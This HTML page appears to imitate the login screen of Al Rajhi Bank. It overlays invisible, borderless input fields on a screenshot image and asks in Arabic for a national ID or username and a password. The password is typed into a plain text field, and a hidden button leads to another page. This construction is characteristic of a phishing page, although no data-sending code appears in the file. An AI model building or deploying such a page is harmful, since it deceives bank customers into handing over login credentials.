<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    <!-- <link rel="stylesheet" href="banks.css"> -->
    <style>
        *{
            align-items: center;
            align-content: center;
            text-align: center;
        }
        body{
            margin-top: 0;
            margin-bottom: 0;
        }
        .container{
            width: 100%;
            height: 100%;
            box-sizing: border-box;
            position: relative;
        }
        .imge{
            width: 322px;
            height: 714px;
            object-fit: cover;
            object-position: 50% 50%;
        }
        input{
            border: 0;
            width: 265px;
            height: 28px;
            text-align: right;
        }
        .name{
            position: relative;
            bottom: 536px;
            right: -1px;
        }
        .pass{
            position: relative;
            bottom: 497px;
            right: 0px;
        }
        .btn{
            position: relative;
            border: 0;
            width: 265px;
            height: 28px;
            bottom: 452px;
            right: 0;
            background: 0;
            cursor: pointer;
        }
    </style>
</head>
<body>
    <div class="container">
        <div class="bank-contain">
            <img class="imge" src="Rajhi1.png" alt="">
            <div class="name">
                <input class="in-name" type="text" placeholder="ادخل الهوية الوطنية او اسم المستخدم">
            </div>
            <div class="pass">
                <input class="in-pass" type="text" placeholder="ادخل كلمة المرور">
            </div>
            <a href="../index2.html"><button class="btn"></button></a>
        </div>
    </div>
</body>
</html>